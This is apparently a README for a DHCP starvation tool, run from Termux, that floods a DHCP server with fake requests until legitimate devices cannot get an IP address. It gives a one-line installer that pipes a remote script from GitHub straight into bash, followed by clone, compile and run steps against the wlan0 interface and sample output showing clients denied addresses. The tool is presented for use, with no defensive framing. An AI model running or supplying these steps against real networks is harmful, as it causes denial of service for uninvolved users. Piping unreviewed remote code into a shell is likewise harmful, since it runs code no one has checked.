A DHCP starvation tool is a powerful network attack tool that floods a DHCP server with fake DHCP requests, exhausting all available IP addresses in the DHCP pool. This prevents legitimate clients from obtaining an IP address, leading to network disruptions or a complete denial of service (DoS) for affected devices.
- g++/gcc compiler
- Termux
pkg update && pkg install wget -y && wget -qO- https://raw.githubusercontent.com/xiv3r/dhcp-starvation/refs/heads/main/auto | bash && cd dhcp-starvation
$${\color{magenta}install- package}$$
pkg update
pkg install wget git clang -y
$${\color{magenta}clone- the- repo}$$
git clone https://github.com/xiv3r/dhcp-starvation.git
cd dhcp-starvation
$${\color{magenta}compiling}$$
g++ fuck.cpp -o fuck
$${\color{magenta}run}$$
add interface "
./fuck -i wlan0
"
./fuck
$${\color{magenta}impact}$$
$ Disconnect and Reconnect
Tested on GW: 192.168.1.1-255/24
Connecting...
Obtaining IP...
No IP Allocation...